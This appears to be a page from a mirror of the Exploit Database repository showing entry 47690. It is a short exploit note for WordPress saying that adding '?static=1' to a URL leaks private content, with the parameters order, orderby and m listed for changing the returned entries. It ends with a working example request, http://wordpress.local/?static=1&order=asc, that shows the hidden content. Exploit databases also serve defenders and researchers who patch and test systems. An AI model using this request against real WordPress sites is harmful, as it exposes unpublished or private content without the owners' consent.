exploit-db-mirror/exploits/multiple/webapps/47690.md at main

Offensive Security 36c084c351 DB: 2021-09-03

45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!

2021-09-03 13:39:06 +00:00

405 B

Raw Permalink Blame History

So far we know that adding ?static=1 to a wordpress URL should leak its secret content

Here are a few ways to manipulate the returned entries:

order with asc or desc
orderby
m with m=YYYY, m=YYYYMM or m=YYYYMMDD date format

In this case, simply reversing the order of the returned elements suffices and http://wordpress.local/?static=1&order=asc will show the secret content:

405 B Raw Permalink Blame History

405 B

Raw Permalink Blame History